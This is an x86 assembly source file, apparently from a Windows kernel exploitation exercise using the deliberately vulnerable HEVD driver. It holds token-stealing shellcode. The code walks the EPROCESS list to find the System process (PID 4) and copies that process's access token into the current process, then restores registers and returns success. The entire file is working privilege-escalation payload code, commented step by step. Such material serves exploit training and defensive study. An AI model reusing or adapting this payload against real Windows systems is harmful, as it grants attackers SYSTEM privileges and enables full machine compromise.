windows_kernel_exploitation_hevd/Shellcoding_token_stealing/shellcode.asm

[bits 32]

global _start                     ; Setting entry point

_start:                           ; Entry point
  pushad                          ; Saving current registers in the stack
  xor eax, eax                    ; Cleaning EAX register
  mov eax, [fs:0x124]             ; Grab EPROCESS structure at offset 0x274 (0x120 + 0x4 + 0x150)
  mov eax, [eax + 50h]
  mov ecx, eax                    ; Saving EPROCESS in ECX register

loop_search:
  mov eax, [eax + 0xb8]           ; Saves the following double-linked list structure in EAX
  sub eax, 0xb8                   ; Place the following EPROCESS in EAX
  cmp dword [eax + 0xb4], 0x04    ; Compare current process PID (UniqueProcessId) with system PID
  jnz loop_search

token_stealing:
  mov edx, [eax + 0x0f8]          ; Saving privileged token in EDX register
  mov ebx, [ecx + 0x0f8]          ; Saving current EPROCESS token in EBX
  and edx, 0xFFFFFFF8             ; Applying the mask over the privileged token
  and ebx, 0x7                    ; Getting the RefCnt field
  or edx, ebx                     ; Adding the current RefCnt field to the privileged token
  mov [ecx + 0x0f8], edx          ; Copy the privileged token in the current EPROCESS

restore:
  popad                           ; Restoring registers from the stack
  xor eax, eax                    ; Set NT_STATUS_SUCCESS (excepted return)
  pop ebp
  ret 8